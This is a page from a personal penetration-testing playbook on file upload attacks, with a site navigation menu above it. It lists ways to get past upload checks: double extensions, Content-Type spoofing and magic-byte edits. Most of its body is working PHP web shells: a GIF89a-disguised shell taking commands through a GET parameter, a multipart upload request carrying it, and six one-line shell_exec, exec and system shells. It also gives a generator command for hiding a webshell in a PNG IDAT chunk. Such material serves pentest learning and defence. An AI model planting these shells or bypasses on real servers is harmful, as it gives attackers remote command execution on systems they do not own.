🎃
Jackmeister's Playbook
  • Welcome
  • Web Pentest
    • Mind Maps
    • Server Site Attacks
      • php type juggling
      • SSTI
      • SQL
        • PSG SQL
        • SQL Database Uses
        • SQL Injection
        • Blind SQL injection
        • SQLITE injection
      • psy shell
    • Recon
      • DNS Hunting
      • Web Tech Hunting
      • Credentials Harvesting
      • Subdomain Hunting
      • Javascript Hunting
    • Directory Brute Forcing
    • File Upload Tricks
      • PHP htaccess and ASP web.config bypass
      • PHP Exiftool edit and upload
      • PHP Extensions payloads / Cheatsheet
      • PHP disable_functions bypass
    • Client Site Attacks
      • Case Study - XSS-GPT
      • XSS
        • XSS All in one
        • XSS cookie stealing
        • Payloads / Cheatsheet
      • Javascript Crafting
      • PDF
    • CMS / Framework
      • apache / xampp
      • Django
      • Manegto
      • Joomla
      • Jenkins
      • Flask jinja2
      • tomcat
      • Drupal
      • nodejs
      • wordpress
    • Google Dorking
    • API
    • Command Injection
      • Command Injection Payloads/Cheatsheet
    • Rewrite URL
    • HTTP Request Smuggling (CL.TE)
  • Network Pentest
    • Linux
      • Internal Port Scanning
      • Privileges Escalation
      • Finding files
      • OVA2ROOT
    • Window
      • AV Evading
      • Chrome Password Extract
      • Internal Port Scanning
      • Privileges Escalation
      • ALL IN ONE
      • THM Priv Esc
      • Post Compromise
    • Port Forwarding
      • Playground Setup
    • Exploit Hunting
      • Searchsploit
    • tty-interactive-shell
    • Active Directory (AD)
      • Crackmapexec
  • Wireless Pentest
    • Airgeddon
    • Evil Twin
    • Aircrack
  • Vulnerability Assessment
    • Nmap
    • Nessus
  • General
    • Kiosk Escaping
    • Credential Bruteforcing
  • System Hardening
  • Phishing
    • Gophish
    • Mailing Server
    • SMS Server
    • DNS Server
Powered by GitBook
On this page
  • PHP Function Exploit
  • Content-Types of Common Files

Was this helpful?

  1. Web Pentest

File Upload Tricks

When uploading files , check for validation on :

  1. File extension

    • Server side extension allowed ? :

    php
    phtml
    php4
    • Stacking / Double Extension

    .php.png
    .%20.php

Using gif (shell.php)

GIF89a;
<?php
system($_GET['cmd']);
?>

Advanced gif

Content-Disposition: form-data; name="upload"; filename="web.php"
Content-Type: image/png

GIF89a;
<?php
system($_GET['cmd']);
?>

  1. Content-Type header

  • Is server extension like php able to bypass the upload restriction ?

- If yes , just change content-type header to like image and it will still run as php.

  • Does the server validate content-type header like disallow application/json?

  1. Magic bytes (file hex value)

  • Does the server check file signature ?

  • If no , can change file signature using hexedit

PHP Function Exploit

imagecopyresampled imagecreatefromstring

solution :Hide the webshell in the IDAT chunk of PNG

https://github.com/huntergregal/PNG-IDAT-Payload-Generator/tree/master
python3 generate.py -m php -o webshell.png

Rename to webshell.png.php

Shell exec

php

shell_exec() , exec() , system()

Examples

<?php echo shell_exec($_GET['command']); ?>
<?php echo exec($_GET['command']); ?>
<?php echo system($_GET['command']); ?>
<?php echo exec($_GET['e'].' 2>&1'); ?>
<?php system($_GET['e'].' 2>&1'); ?>
<?php echo shell_exec($_GET['e'].' 2>&1'); ?>

Content-Types of Common Files

Pictures :

image/png
image/jpeg
image/gif

JSON :

application/json

PHP :

application/x-php
application/x-www-form-urlencoded
multipart/form-data
application/octet-stream

TXT :

text/plain

XML :

application/xml  
text/xml

HTML :

text/html

JAVASCRIPT :

text/javascript
application/javascript

PDF

application/pdf

AUDIO

audio/mpeg
audio/wav

VIDEO

video/mp4
video/quicktime
PreviousDirectory Brute ForcingNextPHP htaccess and ASP web.config bypass

Last updated 1 year ago

Was this helpful?